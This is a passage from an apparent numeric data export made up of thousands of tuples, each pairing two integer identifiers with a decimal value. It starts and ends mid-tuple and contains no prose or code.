209,0.18662),(4849,1529209,0.18662),(4938,1529209,0.18662),(4924,1529209,0.22661),(4940,1529209,0.22661),(4614,1529209,0.27993),(4761,1529209,0.27993),(4777,1529209,0.27993),(4625,1529209,0.46655),(4626,1529209,0.55986),(4734,1529209,1.43964),(4604,1536187,0.32669),(4614,1536187,0.32669),(4604,1536188,1.05),(4604,1536189,1.12),(4604,1536262,0.84),(4626,1536262,5.04),(4604,1536263,1.09669),(4604,1536264,1.19),(4617,1536265,1.07331),(4604,1536265,2.14662),(4625,1536265,3.21993),(4626,1536265,4.29324),(4604,1536266,1.12),(4604,1536267,1.37669),(4604,1536268,0.46669),(4617,1536268,0.46669),(4625,1536268,0.46669),(4626,1536268,0.46669),(4604,1536269,1.02669),(4617,1536269,1.02669),(4625,1536269,1.02669),(4626,1536269,1.02669),(4604,1536270,1.16669),(4617,1536270,1.16669),(4625,1536270,1.16669),(4626,1536270,1.16669),(4604,1536456,0.32669),(4604,1536457,1.07331),(4604,1536458,1.16669),(4604,1536459,0.18669),(4693,1536459,0.18669),(4940,1536459,0.37338),(4764,1536459,0.45339),(4604,1536460,1.02669),(4604,1536461,1.28331),(4608,1540243,0.65338),(4608,1540244,2.24),(4608,1540245,2.70662),(4608,1540246,1.30662),(4608,1540247,2.52),(4608,1540248,2.8),(4608,1540406,0.46669),(4614,1540406,0.46669),(4608,1540407,1.12),(4614,1540407,1.12),(4608,1540408,1.21331),(4608,1540409,0.86331),(4626,1540409,8.6331),(4608,1540410,1.86662),(4608,1540411,0.98),(4608,1540412,1.28331),(4608,1540413,1.30662),(4608,1540414,2.61338),(4608,1540415,2.8),(4608,1540416,0.84),(4608,1540417,1.09669),(4608,1540418,0.37331),(4608,1540419,1.07331),(4608,1540420,1.30669),(4608,1540421,0.93338),(4608,1540422,2.33338),(4608,1540423,2.61338),(4608,1540424,1.12),(4608,1540425,2.28662),(4608,1540426,2.66),(4614,1546513,0.93331),(4614,1546514,1.37669),(4614,1546709,1.19),(4614,1546710,0.79331),(4614,1546711,0.84),(4614,1546712,0.95669),(4614,1546713,1.09669),(4614,1546714,3.64),(4614,1546715,1.16669),(4614,1546716,1.09669),(4614,1546717,1.07331),(4614,1546718,1.09669),(4614,1546719,0.95669),(4614,1546720,1.12),(4614,1546721,0.60669),(4614,1546722,1.26),(4614,1546723,1.33),(4614,1546724,0.37331),(4614,1546725,1.05),(4614,1546726,1.35331),(4614,1546727,0.42),(4614,1546728,1.14331),(4614,1546729,1.4),(4614,1546730,1.12),(4616,1546730,1.12),(4614,1546731,1.16669),(4614,1546732,0.86331),(4614,1546733,0.93331),(4614,1546734,0.95669),(4614,1546735,1.00331),(4614,1546736,0.60669),(4614,1546737,1.16669),(4614,1546738,1.21331),(4614,1546739,0.56),(4614,1546740,1.07331),(4614,1546741,1.21331),(4614,1546742,0.42),(4614,1546743,1.21331),(4614,1546744,1.4),(4614,1546745,0.84),(4614,1546746,2.00662),(4614,1546747,1.14331),(4614,1546748,1.19),(4614,1546749,0.60669),(4614,1546750,1.21331),(4614,1546751,1.4),(4614,1546752,0.46669),(4614,1546753,1.07331),(4614,1546754,1.26),(4614,1546755,1.44),(4614,1546756,1.21331),(4614,1546757,1.30669),(4614,1547104,0.46669),(4614,1547105,1.09669),(4614,1547106,1.19),(4625,1547107,0.09331),(4710,1547107,0.09331),(4849,1547107,0.09331),(4927,1547107,0.09331),(4614,1547107,0.18662),(4777,1547107,0.22661),(4938,1547107,0.27993),(4721,1547107,0.37324),(4917,1547107,0.37324),(4940,1547107,0.50654),(4734,1547107,0.83979),(4626,1547107,0.9331),(4614,1547108,0.98),(4614,1547109,1.07331),(4614,1547110,1.05),(4614,1547111,1.09669),(4616,1547900,0.88669),(4616,1547901,1.07331),(4616,1547902,0.93331),(4616,1547903,1.16669),(4616,1547904,0.28),(4616,1547905,0.98),(4616,1547906,1.16669),(4616,1547907,0.56),(4616,1547908,1.12),(4616,1547909,1.21331),(4616,1547910,0.32669),(4616,1547911,0.93331),(4616,1547912,1.07331),(4616,1547913,1.21331),(4616,1547914,0.18669),(4616,1547915,1.16669),(4616,1547916,1.33),(4616,1548048,0.42),(4616,1548049,1.00331),(4616,1548050,1.05),(4617,1548353,0.93331),(4617,1548354,1.19),(4617,1548355,1.33),(4617,1548356,0.32669),(4625,1548356,0.65338),(4617,1548357,0.93331),(4617,1548358,1.09669),(4617,1548359,0.51331),(4617,1548360,1.00331),(4617,1548361,1.19),(4624,1553944,0.09338),(4624,1553945,0.77),(4624,1553946,0.84),(4624,1553947,0.79331),(4624,1553948,1.14331),(4624,1553949,0.28),(4624,1553950,1.12),(4624,1553951,1.4),(4624,1554288,1.77338),(4798,1554288,2.66007),(4624,1554289,0.81669),(4624,1554290,0.95669),(4624,1554291,0.88669),(4626,1554291,0.88669),(4624,1554292,1.02669),(4624,1554293,1.05),(4624,1554294,1.14331),(4624,1554295,0.91),(4624,1554296,1.00331),(4624,1554297,0.98),(4624,1554298,1.07331),(4624,1554299,0.51331),(4624,1554300,1.05),(4624,1554301,1.19),(4624,1554302,0.42),(4624,1554303,1.33),(4624,1554304,1.4),(4624,1554305,0.51331),(4624,1554306,1.12),(4624,1554307,1.21331),(4625,1555171,1.09669),(4625,1555172,1.28331),(4625,1555173,0.91),(4625,1555174,1.05),(4625,1555175,1.02669),(4625,1555176,1.12),(4625,1555177,0.93331),(4625,1555178,1.14331),(4625,1555179,0.86331),(4625,1555180,0.93331),(4625,1555181,0.86331),(4625,1555182,1.00331),(4625,1555183,0.88669),(4625,1555184,0.98),(4625,1555185,0.37331),(4625,1555186,0.95669),(4625,1555187,1.16669),(4625,1555188,0.37331),(4625,1555189,0.95669),(4625,1555190,1.07331),(4625,1555191,0.42),(4625,1555192,1.16669),(4625,1555193,1.21331),(4625,1555194,1.16669),(4625,1555195,1.23669),(4625,1555196,1.23669),(4625,1555197,0.88669),(4625,1555198,1.07331),(4625,1555199,1.09669),(4625,1555200,1.26),(4625,1555201,1.00331),(4625,1555202,1.21331),(4625,1555203,0.93331),(4625,1555204,1.19),(4625,1555205,0.51331),(4625,1555206,1.19),(4625,1555207,1.4),(4710,1555208,0.42),(4938,1555208,0.42),(4625,1555208,0.84),(4626,1555208,0.84),(4625,1555209,1.09669),(4625,1555210,1.28331),(4625,1555211,1.07331),(4625,1555212,1.19),(4625,1555213,0.56),(4625,1555214,1.21331),(4625,1555215,1.35331),(4625,1555216,0.56),(4625,1555217,1.12),(4625,1555218,1.21331),(4625,1555219,0.37331),(4625,1555220,1.12),(4625,1555221,1.4),(4625,1555222,0.42),(4625,1555223,1.07331),(4625,1555224,1.28331),(4625,1555225,0.37331),(4625,1555226,0.98),(4625,1555227,1.21331),(4625,1555460,1.00331),(4625,1555461,1.07331),(4626,1556562,1.07331),(4626,1556563,1.33),(4626,1556564,0.95669),(4626,1556565,1.02669),(4626,1556566,2.14662),(4626,1556567,1.12),(4626,1556568,1.14331),(4626,1556569,1.14331),(4626,1556570,0.91),(4626,1556571,1.00331),(4626,1556572,1.00331),(4626,1556573,1.07331),(4626,1556574,0.46669),(4626,1556575,1.16669),(4626,1556576,1.4),(4626,1556577,1.21331),(4626,1556578,1.4),(4626,1556579,1.30669),(4626,1556580,1.28331),(4626,1556581,0.98),(4626,1556582,1.02669),(4626,1556583,1.12),(4626,1556584,1.16669),(4626,1556585,1.19),(4626,1556586,1.4),(4626,1556587,1.16669),(4626,1556588,1.37669),(4626,1556589,0.65331),(4626,1556590,1.23669),(4626,1556591,1.4),(4626,1556592,0.32669),(4626,1556593,1.09669),(4626,1556594,1.35331),(4626,1556883,0.42),(4626,1556884,1.16669),(4626,1556885,1.28331),(4626,1556886,3.00993),(4626,1556887,4.2),(4626,1556888,1.00331),(4626,1556889,1.4),(4626,1556890,1.02669),(4626,1556891,1.4),(4626,1556892,3.92),(4626,1556893,1.12),(4626,1556894,1.12),(4626,1556895,1.09669),(4626,1556896,1.19),(4626,1556897,1.14331),(4626,1556898,1.4),(4626,1556899,2.23986),(4626,1556900,6.58014),(4626,1556901,1.14331),(4626,1556902,1.19),(4626,1556903,1.14331),(4626,1556904,1.19),(4626,1556905,2.28662),(4635,1558537,0.84),(4635,1558538,0.98),(4940,1560667,0.28),(4653,1560667,0.68),(4929,1560667,0.68),(4938,1560667,0.84),(4721,1560667,1.24),(4710,1560667,1.52),(4940,1560668,0.95669),(4938,1560668,1.91338),(4653,1560668,2.32339),(4940,1560669,1.07331),(4938,1560669,2.14662),(4653,1560669,2.60661),(4653,1560684,2.26661),(4653,1560685,2.83339),(4658,1562936,0.9334),(4678,1562936,0.9334),(4837,1562936,1.8668),(4850,1562936,1.8668),(4928,1562936,1.8668),(4951,1562936,1.8668),(4658,1562937,3.0666),(4658,1562938,3.2),(4658,1562939,0.9334),(4658,1563001,1.92),(4658,1563002,4.00008),(4658,1563003,4.72008),(4955,1563004,0.51331),(4755,1563004,0.87996),(4658,1563004,1.02662),(4762,1563004,11.2928),(4761,1563004,17.4525),(4658,1563005,2.1),(4658,1563006,1.30669),(4658,1563007,1.37669),(4658,1563040,0.7),(4658,1563041,1.16669),(4658,1563042,1.4),(4661,1563474,1.16669),(4664,1563623,0.8),(4664,1563624,2.6),(4664,1563625,3.2),(4734,1564328,0.56),(4669,1564752,0.95669),(4669,1564753,1.14331),(4672,1564836,1.02),(4672,1564837,2.49339),(4672,1564838,2.89),(4672,1564839,0.45339),(4672,1564840,2.32339),(4672,1564841,2.89),(4693,1564931,0.60669),(4851,1565378,1.16669),(4852,1565378,1.16669),(4678,1565378,2.83339),(4850,1565378,2.83339),(4928,1565378,2.83339),(4951,1565378,2.83339),(4678,1565397,1.98339),(4678,1565398,2.72),(4693,1569345,1.02669),(4693,1569346,1.26),(4693,1569347,0.23331),(4693,1569348,0.93331),(4693,1569349,1.07331),(4693,1569350,0.84),(4693,1569351,0.95669),(4693,1569352,1.28331),(4693,1569353,1.05),(4693,1569354,1.12),(4693,1569355,0.56),(4693,1569356,1.4),(4693,1569357,1.4),(4693,1569358,1.00331),(4693,1569359,1.16669),(4693,1569360,1.19),(4693,1569361,1.26),(4693,1569393,0.95669),(4693,1569394,1.4),(4710,1584637,0.23331),(4734,1584637,0.23331),(4721,1584637,0.56661),(4710,1584653,0.42),(4721,1584653,0.42),(4710,1584654,1.00331),(4721,1584654,1.00331),(4710,1592343,0.23331),(4734,1592343,0.23331),(4761,1592343,0.23331),(4777,1592343,0.23331),(4710,1592344,1.00331),(4710,1592345,1.28331),(4710,1592346,0.95669),(4710,1592347,1.07331),(4710,1592348,0.95669),(4710,1592349,1.07331),(4710,1592350,0.88669),(4710,1592351,1.07331),(4710,1592352,2.32339),(4710,1592353,2.89),(4710,1592437,0.91),(4940,1592437,0.91),(4710,1592438,1.12),(4710,1592439,0.28),(4710,1592440,1.09669),(4710,1592441,1.26),(4710,1592442,0.23331),(4710,1592443,1.02669),(4710,1592444,1.21331),(4710,1592445,0.37331),(4710,1592446,1.09669),(4710,1592447,1.35331),(4710,1592448,0.28),(4710,1592449,1.09669),(4710,1592450,1.23669),(4710,1592451,0.56),(4710,1592452,1.16669),(4710,1592453,1.4),(4710,1592454,1.00331),(4710,1592455,1.07331),(4710,1592456,0.18669),(4734,1592456,0.18669),(4710,1592457,1.09669),(4710,1592458,1.14331),(4934,1592459,0.56),(4710,1592459,1.12),(4710,1592460,1.02669),(4710,1592461,1.35331),(4710,1592462,1.16669),(4710,1592463,1.33),(4710,1592464,1.26),(4710,1592465,0.42),(4710,1592466,1.00331),(4710,1592467,1.23669),(4710,1592468,1.09669),(4710,1592469,1.30669),(4710,1592470,0.51331),(4710,1592471,1.21331),(4710,1592472,1.28331),(4710,1592756,0.88669),(4710,1592757,1.09669),(4710,1592758,0.14),(4777,1592758,0.14),(4927,1592758,0.14),(4734,1592758,0.76),(4710,1592759,0.98),(4710,1592760,1.16669),(4710,1592761,0.32669),(4710,1592762,1.07331),(4710,1592763,1.21331),(4721,1603203,1.02669),(4721,1603204,1.19),(4721,1603205,0.91),(4721,1603206,1.14331),(4721,1603207,2.38),(4721,1603208,2.83339),(4721,1603485,0.28),(4721,1603486,0.95669),(4721,1603487,1.14331),(4721,1603488,1.07331),(4721,1603489,1.28331),(4721,1603490,0.93331),(4721,1603491,1.00331),(4721,1603492,0.86331),(4721,1603493,0.98),(4721,1603494,0.98),(4721,1603495,1.09669),(4721,1603496,0.93331),(4721,1603497,1.00331),(4721,1603498,3.73324),(4721,1603499,1.05),(4721,1603500,1.00331),(4721,1603501,1.14331),(4721,1603502,1.19),(4721,1603503,0.95669),(4721,1603504,1.14331),(4721,1603505,0.86331),(4721,1603506,1.12),(4721,1603507,0.88669),(4721,1603508,1.07331),(4721,1603509,0.95669),(4721,1603510,1.05),(4721,1603511,0.81669),(4721,1603512,0.88669),(4721,1603513,2.66007),(4721,1603514,1.02669),(4721,1603515,1.02669),(4721,1603516,1.07331),(4721,1603517,0.91),(4777,1603517,0.91),(4721,1603518,1.02669),(4721,1603519,0.86331),(4721,1603520,1.14331),(4721,1603521,0.28),(4734,1603521,0.28),(4803,1603521,0.28),(4849,1603521,0.28),(4721,1603522,1.07331),(4721,1603523,1.16669),(4721,1603524,0.46669),(4721,1603525,1.12),(4721,1603526,1.19),(4721,1603527,0.46669),(4721,1603528,1.00331),(4721,1603529,1.14331),(4721,1603530,0.42),(4721,1603531,1.12),(4721,1603532,1.26),(4721,1603533,0.60669),(4721,1603534,1.12),(4721,1603535,1.23669),(4721,1603536,0.42),(4721,1603537,1.05),(4721,1603538,1.19),(4721,1603539,0.23331),(4721,1603540,0.91),(4721,1603541,1.02669),(4721,1603542,0.14),(4934,1603542,0.14),(4734,1603542,0.42),(4721,1603543,0.93331),(4721,1603544,1.14331),(4721,1603545,2.60661),(4721,1603546,2.77661),(4721,1603547,0.79331),(4721,1603548,0.98),(4721,1603549,0.86331),(4721,1603550,0.93331),(4721,1603551,0.37331),(4721,1603552,1.07331),(4721,1603553,1.12),(4721,1603554,0.37331),(4721,1603555,1.05),(4721,1603556,1.09669),(4721,1603557,0.46669),(4721,1603558,1.23669),(4721,1603559,1.4),(4721,1603560,1.12),(4721,1603561,0.32669),(4721,1603562,1.07331),(4721,1603563,1.12),(4721,1603564,0.37331),(4721,1603565,0.98),(4721,1603566,1.12),(4721,1603567,0.32669),(4721,1603568,0.93331),(4721,1603569,1.09669),(4721,1603570,0.60669),(4721,1603571,1.14331),(4721,1603572,1.30669),(4721,1603573,0.7),(4721,1603574,1.30669),(4721,1603575,1.4),(4721,1603576,0.28),(4721,1603577,1.09669),(4721,1603578,1.16669),(4721,1603579,0.23331),(4721,1603580,0.98),(4721,1603581,1.12),(4721,1604087,0.09331),(4734,1604087,0.09331),(4813,1604087,0.22661),(4721,1604088,0.88669),(4721,1604089,0.98),(4721,1604090,0.86331),(4721,1604091,1.00331),(4721,1604092,0.81669),(4721,1604093,1.00331),(4721,1604094,0.84),(4721,1604095,0.91),(4721,1604096,0.88669),(4721,1604097,0.93331),(4721,1604098,0.28),(4721,1604099,1.02669),(4721,1604100,1.14331),(4723,1604957,2.5334),(4727,1605073,0.9334),(4727,1605074,2.8666),(4727,1605075,3.4),(4732,1613362,1.0666),(4732,1613568,0.37331),(4732,1613569,1.12),(4732,1613570,1.4),(4732,1613571,0.23331),(4761,1613571,0.23331),(4732,1613572,1.09669),(4732,1613573,1.14331),(4761,1613574,0.32669),(4732,1613574,0.65338),(4732,1613575,1.19),(4732,1613576,1.26),(4732,1613577,1.12),(4732,1613578,1.19),(4732,1613579,0.51331),(4732,1613580,1.14331),(4732,1613581,1.37669),(4734,1615863,1.6),(4734,1615864,2.9334),(4734,1615865,3.7334),(4849,1616426,0.04669),(4927,1616426,0.04669),(4734,1616426,0.09338),(4734,1616427,0.93331),(4734,1616428,1.02669),(4734,1616429,0.86331),(4734,1616430,0.95669),(4734,1616431,0.18669),(4734,1616432,1.02669),(4734,1616433,1.07331),(4734,1616434,0.18669),(4734,1616435,0.84),(4734,1616436,1.12),(4734,1616437,0.7),(4734,1616438,1.4),(4734,1616439,1.4),(4734,1616440,0.95669),(4734,1616441,1.05),(4734,1616837,0.81669),(4734,1616838,1.05),(4734,1616839,0.86331),(4734,1616840,1.07331),(4734,1616841,0.88669),(4734,1616842,1.07331),(4734,1616843,0.98),(4734,1616844,1.35331),(4734,1616845,0.88669),(4734,1616846,0.95669),(4734,1616847,0.93331),(4734,1616848,1.14331),(4734,1616849,0.98),(4734,1616850,1.33),(4734,1616851,1.05),(4734,1616852,1.19),(4734,1616853,3.28008),(4734,1616854,4.08),(4734,1616855,0.91),(4734,1616856,1.12),(4734,1616857,0.91),(4734,1616858,1.09669),(4734,1616859,0.93331),(4734,1616860,1.19),(4734,1616861,0.95669),(4734,1616862,1.05),(4734,1616863,0.93331),(4734,1616864,1.07331),(4734,1616865,0.91),(4734,1616866,1.12),(4734,1616867,0.37331),(4734,1616868,1.07331),(4734,1616869,1.21331),(4734,1616870,0.37331),(4734,1616871,1.05),(4734,1616872,1.37669),(4734,1616873,0.23331),(4734,1616874,0.88669),(4734,1616875,1.02669),(4734,1616876,0.51331),(4734,1616877,1.16669),(4734,1616878,1.37669),(4734,1616879,0.7),(4734,1616880,1.23669),(4734,1616881,0.23331),(4734,1616882,1.05),(4734,1616883,1.14331),(4734,1616884,0.81669),(4734,1616885,0.93331),(4734,1616886,0.91),(4734,1616887,1.12),(4734,1616888,0.95669),(4734,1616889,1.19),(4761,1616890,0.46669),(4734,1616890,1.13339),(4734,1616891,2.43661),(4734,1616892,2.60661),(4734,1616893,0.46669),(4734,1616894,1.07331),(4734,1616895,1.28331),(4734,1616896,0.84),(4734,1616897,1.02669),(4734,1616898,1.19),(4734,1616899,1.09669),(4734,1616900,1.23669),(4734,1616901,0.23331),(4734,1616902,1.00331),(4734,1616903,1.05),(4734,1616904,0.18669),(4734,1616905,0.98),(4734,1616906,1.16669),(4734,1616907,1.00331),(4734,1616908,1.07331),(4734,1616909,1.00331),(4734,1616910,1.21331),(4734,1616911,0.88669),(4734,1616912,1.00331),(4734,1616913,0.98),(4734,1616914,1.05),(4734,1616915,0.91),(4734,1616916,1.07331),(4734,1616917,0.95669),(4734,1616918,1.09669),(4734,1616919,0.95669),(4734,1616920,1.14331),(4734,1616921,1.00331),(4734,1616922,1.21331),(4734,1616923,2.32339),(4734,1616924,2.89),(4734,1616925,0.88669),(4734,1616926,1.16669),(4734,1616927,0.91),(4734,1616928,1.07331),(4734,1616929,0.81669),(4734,1616930,1.05),(4734,1616931,0.98),(4734,1616932,1.02669),(4734,1616933,0.95669),(4734,1616934,1.02669),(4734,1616935,1.05),(4734,1616936,1.30669),(4734,1616937,1.00331),(4734,1616938,1.12),(4734,1616939,1.82),(4924,1616939,2.21),(4734,1616940,1.05),(4734,1616941,0.98),(4734,1616942,0.42),(4734,1616943,1.02669),(4734,1616944,1.16669),(4734,1616945,0.51331),(4734,1616946,1.19),(4734,1616947,1.30669),(4734,1616948,0.56),(4734,1616949,1.09669),(4734,1616950,1.26),(4734,1616951,0.46662),(4734,1616952,1.02669),(4734,1616953,1.28331),(4734,1616954,0.98),(4734,1616955,1.07331),(4734,1616956,0.32669),(4734,1616957,1.14331),(4734,1616958,1.26),(4734,1616959,0.32669),(4734,1616960,1.02669),(4734,1616961,1.09669),(4734,1616962,0.28),(4734,1616963,0.81669),(4734,1616964,1.05),(4734,1616965,0.84),(4734,1616966,1.00331),(4734,1616967,0.23331),(4734,1616968,0.86331),(4734,1616969,1.07331),(4734,1616970,0.42),(4734,1616971,1.02669),(4734,1616972,1.07331),(4734,1617686,0.79331),(4734,1617687,0.91),(4734,1617688,0.79331),(4734,1617689,0.88669),(4734,1617690,0.84),(4734,1617691,0.91),(4734,1617692,0.86331),(4734,1617693,0.91),(4734,1617694,0.79331),(4734,1617695,0.93331),(4734,1617696,1.16669),(4734,1617697,1.4),(4734,1617698,0.81669),(4734,1617699,0.98),(4734,1617700,0.91),(4734,1617701,1.30669),(4734,1617702,0.81669),(4734,1617703,0.95669),(4734,1617704,0.86331),(4734,1617705,0.98),(4734,1617706,0.88669),(4734,1617707,1.14331),(4734,1617708,3.04008),(4734,1617709,1.00331),(4734,1617710,2.26661),(4734,1617711,0.81669),(4734,1617712,1.05),(4734,1617713,0.28),(4734,1617714,1.09669),(4734,1617715,1.26),(4734,1617716,0.18669),(4734,1617717,0.91),(4734,1617718,0.98),(4735,1617913,1.3334),(4735,1617914,3.5334),(4762,1620486,23.1),(4761,1620486,35.7),(4762,1620617,1.07331),(4761,1620617,2.14662),(4762,1620618,1.23669),(4761,1620618,2.47338),(4762,1620619,4.62),(4761,1620619,9.24),(4761,1620634,1.16669),(4762,1620634,1.16669),(4761,1620635,1.21331),(4762,1620635,1.21331),(4762,1620642,5.13359),(4761,1620642,5.60028),(4761,1620667,0.84),(4762,1620667,0.84),(4762,1620674,0.42),(4761,1620674,0.84),(4761,1620677,0.84),(4762,1620677,2.38),(4761,1620678,5.32014),(4762,1620678,15.0737),(4761,1620679,0.95669),(4762,1620679,0.95669),(4741,1621232,0.98),(4741,1621233,1.09669),(4749,1623516,0.95669),(4753,1623516,0.95669),(4851,1623516,0.95669),(4749,1623517,1.09669),(4851,1623517,1.09669),(4753,1623647,1.05),(4759,1623819,0.8),(4759,1623820,2.6666),(4759,1623821,2.8),(4759,1623822,0.9334),(4764,1623822,0.9334),(4759,1623823,2.9334),(4759,1623824,3.2),(4761,1626615,0.7),(4761,1626616,1.4),(4761,1626617,1.4),(4761,1626618,1.14331),(4761,1626619,1.23669),(4761,1626620,0.7),(4761,1626621,1.21331),(4761,1626622,1.35331),(4761,1626623,1.14331),(4761,1626624,1.14331),(4761,1626625,1.14331),(4761,1626626,1.14331),(4761,1626627,2.28662),(4761,1626628,1.14331),(4761,1626629,1.14331),(4761,1626630,2.24),(4761,1626631,1.14331),(4761,1626632,1.14331),(4761,1626633,1.14331),(4761,1626634,1.14331),(4761,1626635,1.14331),(4761,1626636,1.14331),(4761,1626637,2.24),(4761,1626638,1.12),(4761,1626639,1.12),(4761,1626640,1.12),(4761,1626641,1.12),(4761,1626642,2.24),(4761,1626643,1.14331),(4761,1626644,1.12),(4761,1626645,1.12),(4761,1626646,1.12),(4761,1626647,1.12),(4761,1626648,5.83345),(4761,1626649,0.91),(4761,1626650,0.95669),(4761,1626866,1.02669),(4761,1626867,1.21331),(4761,1626868,0.23331),(4777,1626868,0.23331),(4761,1626869,1.02669),(4761,1626870,1.09669),(4761,1626871,1.14331),(4761,1626872,1.4),(4761,1626873,1.16669),(4761,1626874,1.21331),(4761,1626875,1.16669),(4761,1626876,1.21331),(4761,1626877,1.16669),(4761,1626878,1.21331),(4761,1626879,1.16669),(4761,1626880,1.21331),(4761,1626881,1.16669),(4761,1626882,1.21331),(4761,1626883,1.16669),(4761,1626884,1.21331),(4761,1626885,1.16669),(4761,1626886,1.21331),(4761,1626887,1.16669),(4761,1626888,1.21331),(4761,1626889,1.16669),(4761,1626890,1.21331),(4761,1626891,1.16669),(4761,1626892,1.21331),(4761,1626893,1.16669),(4761,1626894,1.21331),(4761,1626895,1.16669),(4761,1626896,1.21331),(4761,1626897,1.16669),(4761,1626898,1.21331),(4761,1626899,1.16669),(4761,1626900,1.21331),(4761,1626901,1.16669),(4761,1626902,1.21331),(4761,1626903,1.16669),(4761,1626904,1.21331),(4761,1626905,1.16669),(4761,1626906,1.21331),(4761,1626907,1.16669),(4761,1626908,1.21331),(4761,1626909,1.16669),(4761,1626910,1.21331),(4761,1626911,1.16669),(4761,1626912,1.21331),(4761,1626913,1.16669),(4761,1626914,1.21331),(4761,1626915,1.19),(4761,1626916,1.23669),(4761,1626917,1.19),(4761,1626918,1.23669),(4761,1626919,1.19),(4761,1626920,1.23669),(4761,1626921,1.19),(4761,1626922,1.23669),(4761,1626923,1.19),(4761,1626924,1.23669),(4761,1626925,1.19),(4761,1626926,1.23669),(4761,1626927,1.19),(4761,1626928,1.23669),(4761,1626929,1.19),(4761,1626930,1.23669),(4761,1626931,1.19),(4761,1626932,1.23669),(4761,1626933,1.19),(4761,1626934,1.23669),(4761,1626935,1.19),(4761,1626936,1.23669),(4761,1626937,1.19),(4761,1626938,1.23669),(4761,1626939,0.88669),(4761,1626940,1.02669),(4761,1626941,0.93331),(4761,1626942,0.98),(4761,1626943,1.00331),(4761,1626944,1.21331),(4761,1626945,1.07331),(4761,1626946,1.28331),(4761,1626947,0.37331),(4761,1626948,1.07331),(4761,1626949,1.21331),(4761,1626950,1.05),(4761,1626951,1.30669),(4761,1626952,0.60669),(4761,1626953,1.14331),(4761,1626954,1.33),(4761,1626955,1.4),(4761,1626956,1.4),(4761,1626957,1.05),(4761,1626958,1.30669),(4761,1626959,0.46669),(4761,1626960,0.98),(4761,1626961,1.21331),(4761,1626962,1.00331),(4761,1626963,1.12),(4761,1626964,1.05),(4761,1626965,1.96),(4761,1626966,2.73),(4761,1626967,3.15),(4761,1626968,0.18669),(4761,1626969,0.98),(4761,1626970,1.30669),(4762,1628258,2.19338),(4762,1628259,4.38676),(4762,1628260,2.19338),(4762,1628261,2.19338),(4762,1628262,4.38676),(4762,1628263,2.19338),(4762,1628264,3.29007),(4762,1628265,2.19338),(4762,1628364,0.18669),(4762,1628365,1.12),(4762,1628366,1.35331),(4762,1628367,1.16669),(4762,1628368,1.21331),(4762,1628369,1.16669),(4762,1628370,1.21331),(4762,1628371,1.16669),(4762,1628372,1.21331),(4762,1628373,1.16669),(4762,1628374,1.21331),(4762,1628375,1.16669),(4762,1628376,1.21331),(4762,1628377,1.16669),(4762,1628378,1.21331),(4762,1628379,1.16669),(4762,1628380,1.21331),(4762,1628381,1.16669),(4762,1628382,1.21331),(4762,1628383,1.16669),(4762,1628384,1.21331),(4762,1628385,1.16669),(4762,1628386,1.21331),(4762,1628387,1.19),(4762,1628388,1.23669),(4762,1628389,1.19),(4762,1628390,1.23669),(4762,1628391,1.19),(4762,1628392,1.23669),(4762,1628393,1.19),(4762,1628394,1.23669),(4762,1628395,1.19),(4762,1628396,1.23669),(4762,1628397,1.19),(4762,1628398,1.23669),(4762,1628399,1.19),(4762,1628400,1.23669),(4762,1628401,1.19),(4762,1628402,1.23669),(4762,1628403,1.19),(4762,1628404,1.23669),(4762,1628405,1.19),(4762,1628406,1.23669),(4762,1628407,1.19),(4762,1628408,1.23669),(4762,1628409,1.12),(4762,1628410,1.30669),(4762,1628411,0.88669),(4762,1628412,1.00331),(4762,1628413,1.09669),(4762,1628414,1.28331),(4762,1628415,1.09669),(4762,1628416,1.28331),(4762,1628417,1.09669),(4762,1628418,1.23669),(4762,1628419,9.14648),(4762,1628420,9.14648),(4762,1628421,0.56),(4762,1628422,1.16669),(4762,1628423,1.4),(4762,1628424,1.12),(4762,1628425,2.47338),(4762,1628426,2.66),(4764,1629035,2.8),(4764,1629036,3.5334),(4764,1629037,2.6),(4764,1629065,2.49339),(4764,1629066,3.00339),(4770,1629215,0.56661),(4770,1629216,2.26661),(4770,1629217,2.60661),(4773,1629283,0.68),(4773,1629284,2.32339),(4777,1629495,0.86331),(4777,1629496,1.07331),(4777,1629497,0.51331),(4777,1629498,1.16669),(4777,1629499,1.30669),(4777,1629582,0.28),(4777,1629583,0.86331),(4777,1629584,0.95669),(4777,1629585,0.84),(4777,1629586,1.02669),(4777,1629587,0.84),(4777,1629588,0.93331),(4777,1629589,2.43661),(4777,1629590,3.04008),(4777,1629591,0.93331),(4777,1629592,2.32339),(4777,1629593,1.05),(4777,1629594,0.32669),(4777,1629595,1.02669),(4777,1629596,1.19),(4777,1629597,0.32669),(4777,1629598,0.95669),(4777,1629599,1.09669),(4777,1629600,1.05),(4777,1629601,1.28331),(4777,1629602,0.56),(4777,1629603,1.14331),(4777,1629604,1.21331),(4777,1629605,0.32669),(4777,1629606,1.00331),(4777,1629607,1.19),(4777,1629608,0.91),(4777,1629609,1.00331),(4777,1629610,1.07331),(4777,1629611,0.91),(4777,1629612,1.23669),(4803,1629613,0.14),(4777,1629613,0.28),(4777,1629614,0.91),(4777,1629615,1.09669),(4777,1629616,1.00331),(4777,1629617,1.19),(4777,1629808,0.23331),(4777,1629809,1.02669),(4777,1629810,1.09669),(4777,1629811,2.26661),(4777,1629812,2.55),(4777,1629813,0.88669),(4777,1629814,0.95669),(4778,1629867,1.24661),(4778,1629868,2.72),(4780,1629964,2.38),(4780,1629965,2.60661),(4798,1643328,0.09331),(4798,1643329,0.88669),(4798,1643330,0.93331),(4798,1643331,1.11993),(4798,1643332,2.79993),(4798,1643333,3.15),(4798,1643494,0.46669),(4798,1643495,1.05),(4798,1643496,1.33),(4798,1643497,0.32669),(4798,1643498,0.93331),(4798,1643499,1.12),(4798,1643500,0.42),(4798,1643501,0.95669),(4798,1643502,1.26),(4798,1643503,0.95669),(4798,1643504,0.98),(4798,1643505,1.37669),(4798,1643506,0.42),(4798,1643507,1.16669),(4798,1643508,1.4),(4798,1643509,1.21338),(4798,1643510,2.24),(4798,1643511,2.70662),(4798,1643512,0.32669),(4798,1643513,0.98),(4798,1643514,1.26),(4798,1643515,0.37331),(4798,1643516,1.07331),(4798,1643517,1.23669),(4803,1645040,0.37331),(4803,1645041,1.05),(4803,1645042,1.09669),(4803,1645043,1.00331),(4803,1645044,1.23669),(4803,1645045,0.28),(4940,1645045,0.28),(4803,1645046,1.00331),(4803,1645047,1.07331),(4803,1645048,0.91),(4803,1645049,0.98),(4803,1645050,0.18669),(4803,1645051,1.00331),(4803,1645052,1.05),(4813,1645537,1.98339),(4813,1645538,2.26661),(4814,1645605,2.26661),(4814,1645606,2.60661),(4837,1646510,5.3332),(4850,1646510,5.3332),(4928,1646510,5.3332),(4951,1646510,5.3332),(4837,1646511,5.6),(4837